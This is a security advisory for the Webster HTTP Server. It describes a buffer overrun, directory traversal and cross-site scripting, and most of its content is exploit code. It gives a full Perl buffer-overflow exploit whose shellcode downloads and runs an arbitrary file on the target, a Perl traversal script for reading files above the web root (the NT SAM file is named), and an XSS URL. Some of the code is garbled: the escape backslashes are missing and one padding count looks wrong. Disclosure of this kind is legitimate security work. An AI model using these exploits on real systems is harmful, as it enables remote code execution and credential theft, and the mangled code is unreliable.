‘Webster HTTP Server Buffer Overflow Vulnerabilities’

Summary

Webster HTTP Server is an HTTP/1.0 server written in C++ using Microsoft Foundation Classes (MFC). It runs on Windows 95, 98, NT, 2000, ME, and XP platforms. It was first published as a sample application in Microsoft Journal (MSJ). Multiple security flaws have been identified in Webster that could allow an attacker to take various actions on the server, ranging from script execution to complete compromise.’

Credit:

‘The information has been provided by Matthew Murphy.’


Details

‘There are three vulnerabilities in Webster, all related to the processing of malicious requests:

I. Buffer Overrun
There is a security flaw in Webster that allows an attacker to completely compromise the server. If given a URI that is 275 characters or longer, the saved return address will be overwritten. Execution of arbitrary code is possible:

#!/usr/bin/perl
#
# Webster HTTPd GET Request Buffer Overflow
# Vulnerability discovery/exploit by Matthew Murphy
# Shellcode by Enrique A. Compañ Gzz.
# Download and execute arbitrary files on Webster sites
#
# Webster is an HTTP example server that was included in
# the MSDN sample pack. It offers basic static GET support,
# and does not use HTTP/1.1. By sending it a long request
# of roughly 275 bytes, a buffer in the program is overrun,
# and EIP is overwritten on return.
#
# A typical buffer overflow exploit includes its payload
# in the buffer it overflows. However, my buffer here, of
# only 275 bytes, was too small to hold a nearly 300 byte
# shellcode. Rather than fragment the shellcode and risk
# a crash of the server, I decided to put it in an HTTP
# header and jump to that buffer instead.
#
# I ran into another problem — my EIP was 0x008Exxxx. It
# wasn’t totally static, and I couldn’t put nulls in the
# request because Webster would reject it. So, I used an
# EIP of 0x01010101, and padded my buffer so that hitting
# too early resulted in a lot of INCs, but no useful code
# being run.
#
# The buffer overruns, and the saved return address is now
# 0x01010101. When Webster returns, it jumps out of the
# execution path, and straight into our HTTP header with
# a direct jump (UGH!!!), and hits a slide of 0x41 (‘A’)
# characters, and eventually hits the shellcode.
#
# The shellcode retreives a file with urlmon.dll and runs
# it there. Webster is now dead, so you may include in
# your payload the ability to restart the server.
#
# Simple firewalling will stop this exploit, as the HTTP
# service shouldn’t be contacting other hosts to begin
# with.

use IO::Socket;

# kernel32.dll address
# when changing this, replace 0x00 with 0xFF.
# DEFAULT=0x77E80000
$k32_base = ‘xFFxFFxE8x77′;

$a =’x47x45x54x20x2Fx61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61x61′;
$a.=’x61x61x61x01x01x01x01x20x48x54x54x50x2Fx31x2Ex30x0D’;
$a.=’x0Ax55x73x65x72x2Dx41x67x65x6Ex74x3Ax20′;
$a.=’A’x7536897;

# Executor shellcode by Enrique A. Compañ Gzz.

$a.=’xEBx67x5Ex8BxECx8Bx06x66x33xC0x8BxD8x03x40x3Cx8Bx40′;
$a.=’x78x03xC3x8Bx78x20x8Dx3Cx3Bx03x1Fx33xD2x33xC9x43x38′;
$a.=’x13x75x01x41x81x3Bx47x65x74x50x75x0Bx81x7Bx04x72x6F’;
$a.=’x63x41x75x02x74x02xEBxE5x50x41x33xC0xB0x04xF7xE1x8B’;
$a.=’xC8x58x03xC1x83xC0x24xFFx76x02x66xFFx30x5Bx56x83xC6′;
$a.=’x04x46x80x3ExFFx75x03x80x36xFFx81x3Ex4Bx49x4Bx45x75′;
$a.=’xEFxEBx02xEBx4Bx5Ex8BxE5x8Bx06x66x33xC0x50x83xC6x04′;
$a.=’x56x50xFFxD3x83xC6x0Dx56xFFxD0x83xC6x07x56x50xFFxD3′;
$a.=’x33xC9x51x51x83xC6x13x56x83xC6x1Cx56x51xFFxD0x58x50′;
$a.=’x83xEEx08x56x50xFFxD3x33xC9x51x83xEEx14x56xFFxD0x58′;
$a.=’x83xC6x08x56x50xFFxD3x33xC9x51xFFxD0xE8x47xFFxFFxFF’;
$a.=$k32_base;
$a.=’x4Cx6Fx61x64x4Cx69x62x72x61x72x79x41xFFx55x52x4Cx4D’;
$a.=’x4Fx4ExFFx55x52x4Cx44x6Fx77x6Ex6Cx6Fx61x64x54x6Fx46′;
$a.=’x69x6Cx65x41xFFx73x79x73x2Ex65x78x65xFFx45x78x69x74′;
$a.=’x50x72x6Fx63x65x73x73xFFx57x69x6Ex45x78x65x63xFF’;
$a.=$ARGV[0];
$a.=’xFFx4Bx49x4Bx45x0Dx0Ax0Dx0A’;

if (@ARGV > 3 || ARGV < 2) {
  print STDOUT ‘Usage: perl $0 [filename] [host] [port]’;
  exit;
}
$port = 80;
if (@ARGV == 3) {
  $port = $ARGV[2];
}
$f = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>$ARGV[1],PeerPort=>$port);
if (defined($f)) {
  $f->autoflush(1);
  print $f $a;
  undef $f;
  $mesg=sprintf(‘Telnet in on port %d to %s’, $ARGV[1], $port);
} else {
  $mesg=sprintf(‘Connection refused when connecting to %s on port %d’, $ARGV[1], $port);
}
print STDOUT $mesg;

II. Directory Traversal
Another separate security flaw occurs with poor path validation. Webster will follow ‘/../’ sequences in URL path names, allowing access to files above the document root. This vulnerability may be used for further compromise if security sensitive files are retrieved (the Windows NT SAM file, for instance).

#!/usr/bin/perl
#
# Webster Directory Traversal Vulnerability
# Discovery/Exploit by Matthew Murphy

use IO::Socket;
use URI::Escape;

if (@ARGV < 2 || @ARGV > 3) {
  print STDOUT ‘Usage: perl $0 [filename] [host] [port=80]’;
  exit;
}
if (@ARGV == 3) {
  $port = $ARGV[2];
} else {
  $port = 80;
}
$filename = uri_escape($ARGV[0]);
$exploit = ‘GET /../../../../../../../../../%s HTTP/1.0rnrn’;
$f = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>$ARGV[1],PeerPort=>$port);
if (defined($f)) {
  $f->autoflush(1);
  $packet = sprintf($exploit, $filename);
  print $f $packet;
  while (defined($line = <$f>)) {
    print STDOUT $line;
  }
  undef $f;
} else {
  print STDOUT ‘ERROR: Connection refused’;
}

III. Cross-site Scripting
Another small vulnerability was uncovered in Webster. If a path name containing HTML markup is used, that path will be returned to the browser as HTML content, enabling zone bypass.

Example:
http://websterhost.edu/<SCR*IPT>alert(document.URL)</SCRIPT>/’

Categories: Windows